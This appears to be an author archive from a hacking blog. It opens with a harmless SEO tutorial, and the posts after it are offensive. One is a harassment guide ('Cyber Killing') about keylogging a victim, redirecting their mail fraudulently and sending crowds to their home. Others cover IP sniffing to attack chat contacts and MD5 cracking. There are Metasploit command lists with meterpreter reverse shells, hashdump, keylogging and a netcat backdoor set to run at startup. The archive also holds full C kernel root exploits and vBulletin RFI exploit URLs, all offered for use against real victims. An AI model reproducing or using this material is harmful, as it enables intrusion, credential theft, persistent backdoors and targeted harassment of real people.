Author Archives: Lens
How to get top ranking in search engines
The tutorial is all about getting your site listed on top in Search Engines i.e Search Engine Optimization
First thing you need to do is find the keywords you want to optimize for.
There is great tool by Overture (/http://inventory.overture.com/d/sea…ory/suggestion/)
But I would suggest using this free tool called GoodKeywords (/http://www.goodkeywords.com/products/gkw/)
This one does the same job as Overture does but it also supports other Search Engines (Lycos and Teoma etc..)
For example if you want to optimize for the keyword “tech news”, just search for the keyword in any of the tools specified above… It would show you keywords related to that and not of the searches..
Pick the keywords which are related to your site.
For example when you search for “Tech News” you’ll see the following results:
Count Search Term
11770 tech news
351 itt news tech
191 high tech news
60 news tech texas
49 computer tech news
42 bio news tech
34 in itt news tech
30 news tech virginia
29 asia news tech
25 hi tech news
25 sci tech news
Now see what other terms are related to your keyword technology news
Do couple of searches like that and note down around 15-20 keywords.
Then, keep the keywords which are searched most on the top.
Now you need Title Tag for the page.
Title tag should include top 3 keywords, like for “tech news” it can be like :
“Latest Tech News, Information Technology News and Other computer raleted news here.”
Remember that characters should not be more than 95 and should not have more than 3 “,” commas – some search engines might cosider more than 3 commas as spam
Now move on to Meta Tags
You need following Meta Tags in web page
<META http-equiv=”Content-Type” content=”text/html; charset=iso-8859-1″>
<META name=”keywords” content=”keyword1,keyword2,keyword3″>
<META name=”description” content=”brief description about the site”>
<META name=”robots” Content=”Index,Follow”>
No need to have other meta tags like abstract, re-visit and all, most people dont read it.
Now…
<META http-equiv=”Content-Type” content=”text/html; charset=iso-8859-1″>
This tag is tells content type is html and character set used it iso-8859-1 there are other character sets also but this is the one mosty used..
<META name=”keywords” content=”keyword1,keyword2,keyword3″>
This one should have all your keywords inside starting from keyword with most counts…
keyword tag for our example would be something like :
<META name=”keywords” content=”tech news,technology news, computer technology news,information technology,software news”>
Remember to put around 15-20 keywords max not more than that. Dont repeat keywords or dont put keywords like, “tech news”, “info tech news”, “latest tech news” and so on…
<META name=”description” content=”brief description about the site”>
Provide short decription about your site and include all the keywords mentioned in the title tag.
Decription tag should be:
<META name=”description” content=”One Stop for Latest Tech News, Information Technology News, Computer Related and Software news.”>
It can be upto 255 characters and avoid using more than 3 “,” commas
<META name=”robots” Content=”Index,Follow”>
This is used for search robots..following explanation will help you :
index,follow = index the page as well as follow the links
noindex,follow = dont index the page but follow the links
index,nofollow = index the page but dont follow the links
noindex,nofollow = dont index page, dont follow the links
all = same as index,follow
none = same as noindex,nofollow
Now move on to body part of the page
Include all top 3 keywords here,
I would suggest to break the keyword and use it…
For example
YourSiteName.com one stop for all kind of Latest Tech News and Computer Related information and reviews……………..
Include main keywords in <h#> tags <h1><h2> etc..
and start with <h1> and then move to <h2> <h3> etc..
<h1> tag will be too big but CSS can help you there, define small font size in css for H1,H2,… tags
When done with page copy, then you need to provide title and alt tags for images and links.
Use some keywords in the tags but dont add all the keywords and if not neccessary then dont use keywords in it, basically it should explain what is image all about.
Remember to add Top keyword atleast 4 times in the body and other 2 keywords thrice and twice respectively.
Now move on to Footer Part
Try to include top keywords here and see the effect, use site keywords as links i.e.
<a href=”news.php”>Tech News</a> <a href=”software-news.php”>Software News</a> etc..
Now finally, you need to read some more stuff..may be you can all it as bottom lines…
Site Map – This is page where you need to put all the links present in your site, this is will help Search Engines to find the links easily and also provide link for site map in footer, as search engines start scanning the page from bottom.
Robots.txt – This file contains address of directories which should not be scanned by search engines.. more info can be found here : /http://www.robotstxt.org/wc/exclusion.html search engines line google, yahoo ask for robots.txt file.
Valid HTML – Your code should have valid html and doc type, Its kind of diffucult to follow all the standards but you can atleast open and close all the tags properly, you can check your page’s html online here : /http://validator.w3.org/ or you can use this free software called HTML Tidy : /http://tidy.sourceforge.net/
All done now, you just need to check your site with this script, its called SEO Doctor : /http://www.instantposition.com/seo_doctor.cfm
It’ll show you the report of your site with solution.
Now, correct the errors and start submitting the site :
Start with google : /http://google.com/addurl.html
then yahoo : /http://submit.search.yahoo.com/free/request
then move to altavista,alltheweb and other search engies..
Also submit your site to direcories like /http://dmoz.org , /http://jayde.com etc…
Dmoz is must, as google, yahoo and may more search engines uses same directory
And remember, dont try to SPAM with keywords in these directories, dmoz is handled by Human Editors
Submitted the sites, but still i cant see you site on top?
Wait for sometime may be a month or so but keep an eye on your search term, use /http://GoogleAlert.com – this will show whenever google updates for your keywords, it will mail you the new results.
And also check whether your site is listed on google..
use this tool called Google Monitor, it can be downloaded for free from : /http://www.cleverstat.com/google-monitor.htm
How to RUIN somebodies life[Cyber Killing]
Secondly, If you would like to use most of these techniques I would consider getting a VPN or a Proxy. You can get a free VPN here..
It isn’t as good as a legit logless VPN but it is better than nothing.
http://proxpn.com/download.php
You will also need to put a RAT or Keylogger on their computer to gain the information you need in most circumstances.
With their information in hand create a good resume. Good but still believable. Send this resume to all of the jobs in his/her local area and word will quickly spread that this person is of low company. Word of pranks like this will really get around.
Don’t you hate it when creepy people knock at your door? Well try about twenty or more thinking they are going to have a good time!
There are multiple websites for odd balls and creeps to get together for some anonymous hanky spanky. You can find things like this on Craigslist, which is where you will have the best luck for advertising your orgy.
Simply post a few pictures of a sex room you find off of Google, a picture of the slave and the address. The best time for this would be a Saturday night. Make sure the slave is home for this.
Oh, one of the most classic get back pranks ever! However, You aren’t in it just to prank this guy.. you are here to PLAGUE him.
Simply order out from all delivery restaurants in the area. Make sure the order is believable. You could easily have 25 different delivery guys coming to his door within the hour.
This is one of the most infamous of methods to mess with somebody.
Essentially what you do is you order free boxes for your slave. Postal companies will send you free boxes.. You could easily get a few thousand of these boxes sent to the victims house. Littering his front lawn, it will piss off the neighbors and it is possible he could be nabbed for fraud.
Step 2: Go to USPS’s store section and order all the free boxes and mailing envelopes you can.
Step 3: Confirm the address and purchase the boxes.
If I remember correctly you can order up to 25 free packs on a single account. So if you do this correctly, One account can be used to send 500+ boxes. You can make multiple accounts, sending thousands of boxes.. It will be like Boxes from hell!
Who said email is the only way? Lets see how we can ruin his/her life with real mail!
Scare him! – Send truly disturbing images in envelopes, Write In blood red ink. Maybe draw a picture you could imagine a psychopath would, really make this guy quiver.
Making him believe he doesn’t have any bills anymore! – Go to the local USPS office and tell them that you are moving, or you are new to the area and need to redirect your mail temporally. You will then receive an envelope to fill out and drop in any mailbox. There is no checking done by USPS on this. Redirect mail from P.O. Boxes and rural and carrier routes as well.
Now, if you read this.. would it excite you? I’m sure it would REALLY excite a lot of people. Hit up Craigslist and other classifieds stating you are selling a lot of high end stuff, really cheap. You will get many many people coming up the the victims door looking for cheap stuff. Even the cops get involved sometimes because they suspect he stole it all. LOL
There is nothing better than watching the person you hate become lonely and desperate. If he lives with his wife/girlfriend, call.. if she answers quickly hang up. Send used panties and love letters through the mail. This will DEFINITELY raise suspicion. Be creative on this one.
This is by far the most rewarding, insane and satisfying method of making your target absolutely crazy.
First off, You will need to have Yellowpages from the targets area. You can be creative and do a general online search for businesses in the area.
Go from A-Z calling up local businesses (Mask your number), Asking for quotes and services, Arrange meetings at the victims address. Everybody from construction teams, to landscapers to carpentry estimates to exterminators will be at the targets house. Make sure you schedule out these meetings ahead of time and all within an hour or so of each other. You can be willing to bet this will cause quite a stir.
You can go as far as hire labor teams, promising $20 an hour for general labor. You can be willing to bet angry, unemployed men will not think this is funny AT ALL.
If you want to catch everything on tape, simply call local news stations and tell them there will be something big happening that morning around the time you scheduled the businesses to show up.
best case scenario.. The target gets beat up, yelled at, humiliated on national television, put in jail and fined.
[TUT]How To Sniff IPs From MSN,AIM,Skype,Xfire[TUT]
1.) First off lets get this clear, its going take you a little to get used to this program so don’t be mad if you mess up pulling the IP. Second i suggest if its your first time trying to pull a IP Don’t try it on the person that you want to hit off the most just in case you mess up.
2.) The Program we will be using today is called smart sniff the download links are at the bottom. Smartsniff is a network packet analyze it monitors all the incoming and out going data thats going through your PCI Card or WiFi Card. In most cases if its not P2P Such as a IM there will be 2 IPs the one For The server of the Instant Message Provider and The Other IP will be theirs. Now in cases that you want to pull someones IP Straight from Teamviewer that would be very easy.
3.) On To the fun stuff below are some pictures that show the Program in use.
4.) Open Up all the programs you need so i have Xfire Open Putty And Smart Sniff Open and Ready to go
5.) After that log in or if your all ready logged in select your VIC that you want to pull the IP From open up a chat and ill give an example of what you do
Example:
You:Hello
Them:Hey
You:f
You:f
You:f
You:f
You:f
You:f
You:f
You:f
You:f
You:f
All you do is Spam but remember you must click the Green Play button on smart sniff before you do that way it grabs the data/packets the picture below will help you under stand more
6.) Once you have there IP Feel free to Hit them offline or pull there Location and fuck with them all you want
7.) I suggest if your using Skype or AIM To go into a call with them because the packets will Increase Rapidly and you will be able to pull there IP Really quick 
8.) Hope You Liked My Tutorial
Downloads: Smartsniff Here
| TUT | How to download from RS and MU as a premium user | TUT | NO Surveys |
Today i will show you how to download as a premium user from RS (RapidShare) and MU (MegaUpload).
RapidShare
1 – Go here.
2 – Enter your MegaUpload link
3 – Wait some seconds , fill in the captcha and then click ‘Download File’
MegaUpload
1 – Go here.
2 – Enter your RapidShare link
3 – Wait some seconds , fill in the captcha and then click ‘Download File’
Thats all everything for your download needs
[TUT]How to get your computer to have an FBI login screen
1) Download LogonStudios (It’s Vista version but if you have Windows 7 it works)
http://www.megaupload.com/?d=I8DIQ2YN
For xp users: http://www.stardock.com/products/logonstudio/downloads.asp
2) You can download the FBI file here
http://www.wincustomize.com/explore/logonstudio_xp/9606/
or
http://skins19.wincustomize.com/24/79/2479496/26/9859/preview-26-9859.jpg
Optional 3) The switch user button was annoying me so i downloaded this to remove it (I’m the only one on my computer so i doubt ill miss it)
http://www.megaupload.com/?d=8N0EGIW4
Start it up, then open it and it’ll do the rest
For the users that want their ‘switch user’ button back download this:
http://www.megaupload.com/?d=AA5V5SFQ
Just run the file and it will return your button.
thats it enjoy 
How to crack MD5 hashes
In case you did not already know, MD5 is not an encryption, and therefore cannot be decrypted, only cracked.
First off, download “Password Pro” from here.
It is a zip file, so I suggest downloading 7zip.
Extract all of the files to one folder.
It should look similar to this.
For the purpose of this tutorial, I will be cracking this hash: “6dcd0f272fbb7f6f8ff3a8a5e96c45aa:Ws)”, which is formatted as “Hash:Salt”, and is from VBulletin 4.x.x.
Open up notepad, paste in the Hash and salt, and save it anywhere on your computer, preferably in the same folder as Password Pro.
Open up Password Pro and go to “File->Import”
Find the place where you saved the text file with the hash inside of it, and open it.
Fill in the boxes as such.
Note: The bottom is the formatting of the hash and salt in the text file, and the top is the algorithm for VBulletin 4.x.There are different algorithm for different hashes check this one for other hash types algorithm here .
Now, go to “Audit->Preliminary Attack”
(For this hash, as it is simple, it should probably crack it with just this.)
Hit the start button, and watch it go.
If, in the case that a Preliminary Attack does not work, just repeat the previous steps with a Rainbow Attack (If you have a Rainbow Table), a Simple Dictionary Attack, or a Brute Force Attack.
Hope you guys liked it be sure to check for more tuts and hacks
Metasploit Unleashed : Owning the bOx !! [TUTORIAL]
Hello guys this is a another tut of metasploit exploit list needed to own the box
1.Hacking Windows XP with Metasploit tutorial – VNC remote control
use windows/smb/ms08_067_netapi
show optios
set RHOST 192.168.1.1—–>ip target
set payload windows/vncinject/bind_tcp
exploit
[i]2.Metasploit vs Windows 7 and AVG[/i]
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOT 192…->ip Target
set LPORT 5555
exploit
ps
migrate 1880
cd c:\ ls
download program-7.exe /root
run killav
shell
3. Hacking By Metasploit . Windows xp Sp3 . With B14CK_B34RD
use windows/smb/ms08_067_netapi
set LHOST 192.168.1.1—>ip target
set RHOST 192.168.1.1—–>ip target
set payload windows/meterpreter/reverse_tcp
exploit
4.hacking win7 with metasploit
nmap -sS -v -PN 192.168.1-255
use exploit/multi/handler
set LHOST 192.168.1.1—>ip target
set LPORT 5555
set payload windows/meterpreter/reverse_tcp
show optios
set EndOnSession false
show optios
set RHOST 192.——>ip target
set RPORT 4321
show options
exploit
5. Metasploit — Explotando vulnerabilidad en Windows 7
sudo nmap 192.168.—cek target dengan nmap——>445/tcp_open microsoft-ds
use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh
set RHOST 192.168.1.1———–ip target
set RPORT 445
run —-run the exploit
6. Metasploit backdooring
msf3#./msfpayloa windows/meterpreter/reverse_tcp LHOST=192.168.1.1 R |./msfconsole -t
exe -x /tmp/putty.exe -k -o /tmp/putty_pro.exe -e x86/shikata_ga_nai -c 5
root@samuderapase# cd /tmp—->putty.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.1—>ip kita
show options
exploit
?
getuid
use priv
hashdump
keyscan_start
keyscan_dump
sysinfo
msg * ——->msg displayed on the screen
7. ms10 025 metasploit exploitation
nmap -O 192.168.1.7—–see the target operating system
search ms10
use exploit windows/mmsp/ms10_25_wmss_connect_funnel
set payload windows/shell_bind_tcp
show options
set RHOST 192.168.1.7–ip target
exploit
8. IEPeers: ms10_08_ie_behaviors Exploit
search iepeers
use windows/browser/ms10_018_ie_behaviors
set PAYLOAD windows/exec
show options
set SRVHOST 192.168.1.1—>ip kita
set URIPATH /
set CMD calc.exe
set target 1
info—->Available targets ;1 IE 6 spo-sp2 (onclick)
exploit
using url: http://192.168.1.1:8080/
open the browser mozilla or whatever browser used
type: http://192.168.1.1:8080/—enter
wait a few moments…
9. metasploit rpc_dum
nmap -sS 192.168…
135/TCP open
use msrpc_dcom_ms03_026
set payload win32_reverse_meterpreter
show options
set RHOST 192.168—->ip target
set LHOST 192.168—–>ip am
exploit
help
use -m process
execute -f cmd.exe -c
interact 1
c:\winnt\system32\>dir
10.Uploading A Backdoor Metasploit Netcat
meterpreter> upload netcat.exe c:\\WINDOWS\\SYSTEM32\\
meterpreter> reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\Run
meterpreter> reg setval -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\Run -v windows live -d “c:\\WINDOWS\\SYSTEM32\\netcat.exe -L -d -p 5555 -e cmd.exe
meterpreter> reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\Run
meterpreter> reboot
bt~# nc 192.168.1.1 5555
11. BackTrack 4 R1 Metasploit 3 & SET, Hacking Windows 7
cd /pentest/exploits/SET
./set
Enter you choice: 4
enter the ip addres : 192.168.1.1
enter chose ( hit enter for default): 2
enter chose ( hit enter for default):16
set port 4444
open Konqueror /pentest/exploits/SET/
media/sda3———->msf.exe
cd /pentest/exploits/SET# cd ..
/pentest/exploits# cd framework3
./msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168..
set lport 4444
exploit
use priv
help
excecute -f cmd
ipconfig
shell
screenhot
excecute -f explorer
12. ms067 + netcat backdoor
use windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST
set LHOST
exploit
upload /root/nc.exe c:\\WINDOWS\\SYSTEM32\\
P.S :
> Disable your firewalls
> Port Forward
ENjoy the r00t and own the box
Linux Kernel 2.6.13 Local root Exploit
Here is a another local exploit for linux kernal version 2.6.13
#####################################################
# Title: Linux Kernel 2.6.13 Local root Exploit #
# Author: Angel Injection #
# Home: http://1337day.com #
# Thanks To: Inj3ct0r Team #
#####################################################
**
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/prctl.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <linux/a.out.h>
#include <asm/unistd.h>
static struct exec ex;
static char *e[256];
static char *a[4];
static char b[512];
static char t[256];
static volatile int *c;
/* shell code */
__asm__ (" __excode: call 1f \n"
" 1: mov $23, %eax \n"
" xor %ebx, %ebx \n"
" int $0x80 \n"
" pop %eax \n"
" mov $cmd-1b, %ebx \n"
" add %eax, %ebx \n"
" mov $arg-1b, %ecx \n"
" add %eax, %ecx \n"
" mov %ebx, (%ecx) \n"
" mov %ecx, %edx \n"
" add $4, %edx \n"
" mov $11, %eax \n"
" int $0x80 \n"
" mov $1, %eax \n"
" int $0x80 \n"
" arg: .quad 0x00, 0x00 \n"
" cmd: .string \"/bin/sh\" \n"
" __excode_e: nop \n"
" .global __excode \n"
" .global __excode_e \n"
);
extern void (*__excode) (void);
extern void (*__excode_e) (void);
void
error (char *err)
{
perror (err);
fflush (stderr);
exit (1);
}
/* exploit this shit */
void
exploit (char *file)
{
int i, fd;
void *p;
struct stat st;
printf ("\ntrying to exploit %s\n\n", file);
fflush (stdout);
chmod ("/proc/self/environ", 04755);
c = mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0, 0);
memset ((void *) c, 0, 4096);
/* slow down machine */
fd = open (file, O_RDONLY);
fstat (fd, &st);
p =
(void *) mmap (0, st.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
if (p == MAP_FAILED)
error ("mmap");
prctl (PR_SET_DUMPABLE, 0, 0, 0, 0);
sprintf (t, "/proc/%d/environ", getpid ());
sched_yield ();
execve (NULL, a, e);
madvise (0, 0, MADV_WILLNEED);
i = fork ();
/* give it a try */
if (i)
{
(*c)++;
!madvise (p, st.st_size, MADV_WILLNEED) ? : error ("madvise");
prctl (PR_SET_DUMPABLE, 1, 0, 0, 0);
sched_yield ();
}
else
{
nice(10);
while (!(*c));
sched_yield ();
execve (t, a, e);
error ("failed");
}
waitpid (i, NULL, 0);
exit (0);
}
int
main (int ac, char **av)
{
int i, j, k, s;
char *p;
memset (e, 0, sizeof (e));
memset (a, 0, sizeof (a));
a[0] = strdup (av[0]);
a[1] = strdup (av[0]);
a[2] = strdup (av[1]);
if (ac < 2)
error ("usage: binary <big file name>");
if (ac > 2)
exploit (av[2]);
printf ("\npreparing");
fflush (stdout);
/* make setuid a.out */
memset (&ex, 0, sizeof (ex));
N_SET_MAGIC (ex, NMAGIC);
N_SET_MACHTYPE (ex, M_386);
s = ((unsigned) &__excode_e) - (unsigned) &__excode;
ex.a_text = s;
ex.a_syms = -(s + sizeof (ex));
memset (b, 0, sizeof (b));
memcpy (b, &ex, sizeof (ex));
memcpy (b + sizeof (ex), &__excode, s);
/* make environment */
p = b;
s += sizeof (ex);
j = 0;
for (i = k = 0; i < s; i++)
{
if (!p[i])
{
e[j++] = &p[k];
k = i + 1;
}
}
/* reexec */
getcwd (t, sizeof (t));
strcat (t, "/");
strcat (t, av[0]);
execve (t, a, e);
error ("execve");
return 0;
}
source : http://1337day.com/exploits/17146
Linux <= 2.6.37-rc1 serial_multiport_struct Info Leak Exploit
This is a another exploit found by 1337 team for 2010 servers as i have already explained about r00ting is.do use this exploit in your hacks.
* Tested on Linux 2.6.32.1 | Linux 2.6.33.2 | 2.6.32-24-generic | 2.6.37 (2010)
* Result;
* # id
* uid=0(root) gid=0(root)
*
* 3xPl017 F0r x86_64 L1nuX k3rn3L ia32syscall 3muLatL47i0N (again) > x86_64 2.6.27+ ( not for 2.6.27 and below ! )
*
* If y0u g37 3Rr0R > ./1337
* symbol table not available, aborting!
* Process finished < O_o
* C4usE 3xpl017 Re4dS “/proc/kallsyms” | “/proc/ksyms” , iF n07 4va1bl3! iT g1ve5 ErRoR O_o
*
* Upgrade the kernel ksplice without Reboo7, and the vulneRabiLitY is gonE !
*
* Greetz: r0073r(1337day.com) ,r4dc0re ,Sid3^effects | & all members of r00tw0rm.com !
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <termios.h>
#include <linux/serial.h>
#define DEVICE "/dev/ttyS1"
int main(int argc, char* argv[]) {
int ret = 0;
int i, fd, reservedsize;
char* buf;
struct serial_multiport_struct buffer;
printf("[\\m/] Linux <= 2.6.37-rc1 serial_multiport_struct Info Leak Exploit\n");
printf("[\\m/] by Todor Donev\n");
fd = open(DEVICE, O_RDONLY);
if (fd <0) {
printf("[-] Error: f0k\n");
exit(-1);
}
if (argc < 2) {
fprintf(stderr, "[!] usg: %s <leakfile> <reservedsize>\n", argv[0]);
exit(-1);
}
if (argc > 2)
if ((reservedsize = atoi(argv[2])) == 0) {
fprintf(stderr, " [-] Sorry: (atoi) invalid outsize\n");
exit(-1);
}
fprintf(stderr, " [x] Leakfile: %s\n", argv[1]);
fprintf(stderr, " [x] Reservedsize: %u\n", reservedsize);
if ((buf = (char *)malloc(reservedsize)) == NULL) {
perror("Sorry: (malloc)");
fprintf(stderr, " [-] Sorry: Try again with other output size\n");
exit(1);
}
memset(&buffer,0,sizeof(buffer));
printf("[+] Leaking.. =)\n");
if((fd = open(argv[1], O_RDWR | O_CREAT, 0640)) == -1){
printf("[-] Error: f0k =(\n");
exit(-1);
}
for(i=0;i<=reservedsize;i++){
ret += write(fd,&buffer.reserved[i],sizeof(int));
}
close(fd);
printf("\\o/ %d bytez\n",ret);
exit(0);
}
SOURCE : http://1337day.com/exploits/14940
HOPe you guys enjoy the exploit
vBulletin® Version 4.1.7 Beta 1 Mullti Vulnerability[RFI]
Well this is RFI EXPLOIT for the vbullentin 4.1.7Vulnerability DORK : POWERED BYvBulletin® Version 4.1.7 Beta 1" Thankx to 1337day==================================================== vBulletin® Version 4.1.7 Beta 1 Mullti Vulnerability ==================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=0 0 . .--. .--. .---. . 1 1 .'| ) ) / | 0 0 | --: --: / .-.| .-. . . 1 1 | ) ) / ( |( ) | | 0 0 '---' `--' `--' ' `-'`-`-'`-`--| 1 1 ; 0 0 Site : 1337day.com `-' 1 1 Support e-mail : submit[at]inj3ct0r.com 0 0 >> Exploit database separated by exploit 1 1 type (local, remote, DoS, etc.) 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=1 ####################################################### # Vendor: noLogging by SCRiPTZSECTOR.ORG # Date: 2011-07-27 # Author : indoushka +++=[ Dz Offenders Cr3w ]=+++ # KedAns-Dz * Caddy-Dz * Kalashinkov3 # Jago-dz * Kha&miX * T0xic * Ev!LsCr!pT_Dz # Contact : ind0ushka@hotmail.com # Tested on : win SP2 + SP3 Fr / Back | Track 5 fr ######################################################################## # Exploit By indoushka ------------- Powered by vBulletin® Version 4.1.7 Beta 1 RFI : Function: include File: api.php Line: 139 Exploit: http://localhost/vB1/api.php?api_script=[EV!L] ################################################## Function: include File: api.php Line: 139 Exploit: http://localhost/vB1/api.php?api_script=[EV!L] ################################################## Function: require_once File: payment_gateway.php Line: 3 Exploit: http://localhost/vB1/payment_gateway.php?api[classname]=[EV!L] ################################################## Function: require_once File: payment_gateway.php Line: 3 Exploit: http://localhost/vB1/payment_gateway.php?api[classname]=[EV!L] ################################################## Function: include_once File: cronadmin.php Line: 4 Exploit: http://localhost/vB1/admincp/cronadmin.php?nextitem[filename]=[EV!L] ################################################## Function: include File: diagnostic.php Line: 12 Exploit: http://localhost/vB1/admincp/diagnostic.php?match[0]=[EV!L] ################################################## Function: require_once File: diagnostic.php Line: 18 Exploit: http://localhost/vB1/admincp/diagnostic.php?api[classname]=[EV!L] ################################################## Function: require_once File: diagnostic.php Line: 18 Exploit: http://localhost/vB1/admincp/diagnostic.php?api[classname]=[EV!L] ################################################## Function: include_once File: plugin.php Line: 22 Exploit: http://localhost/vB1/admincp/plugin.php?safeid=[EV!L] ################################################## Function: include_once File: plugin.php Line: 22 Exploit: http://localhost/vB1/admincp/plugin.php?safeid=[EV!L] ################################################## Function: include_once File: class_block.php Line: 14 Exploit: http://localhost/vB1/includes/class_block.php?file=[EV!L] ################################################## Function: require_once File: class_humanverify.php Line: 2 Exploit: http://localhost/vB1/includes/class_humanverify.php?chosenlib=[EV!L] ################################################## Function: require_once File: class_humanverify.php Line: 2 Exploit: http://localhost/vB1/includes/class_humanverify.php?chosenlib=[EV!L] ################################################## Function: require_once File: class_paid_subscription.php Line: 24 Exploit: http://localhost/vB1/includes/class_paid_subscription.php?methodinfo[classname]=[EV!L] ################################################## Function: require_once File: class_paid_subscription.php Line: 24 Exploit: http://localhost/vB1/includes/class_paid_subscription.php?methodinfo[classname]=[EV!L] ################################################## Function: require_once File: functions.php Line: 6 Exploit: http://localhost/vB1/includes/functions.php?classfile=[EV!L] ################################################## Function: require_once File: functions.php Line: 6 Exploit: http://localhost/vB1/includes/functions.php?classfile=[EV!L] ################################################## Function: include_once File: functions_cron.php Line: 8 Exploit: http://localhost/vB1/includes/functions_cron.php?nextitem[filename]=[EV!L] ################################################## Function: require File: vb.php Line: 7 Exploit: http://localhost/vB1/vb/vb.php?filename=[EV!L] ################################################## Function: require_once File: class_upgrade.php Line: 48 Exploit: http://localhost/vB1/install/includes/class_upgrade.php?chosenlib=[EV!L] ################################################## Function: require_once File: class_upgrade.php Line: 48 Exploit: http://localhost/vB1/install/includes/class_upgrade.php?chosenlib=[EV!L] ################################################## Function: include_once File: attach.php Line: 80 Exploit: http://localhost/vB1/packages/vbattach/attach.php?package=[EV!L] ################################################## Function: include_once File: attach.php Line: 604 Exploit: http://localhost/vB1/packages/vbattach/attach.php?path=[EV!L] ################################################## Function: include_once File: attach.php Line: 1222 Exploit: http://localhost/vB1/packages/vbattach/attach.php?path=[EV!L] ################################################## Directory Listing ckeditor : http://localhost/vB1/clientscript/ckeditor/ Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel =========================== special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te ---------------------------------------------------------------------------------------------------------------------------------
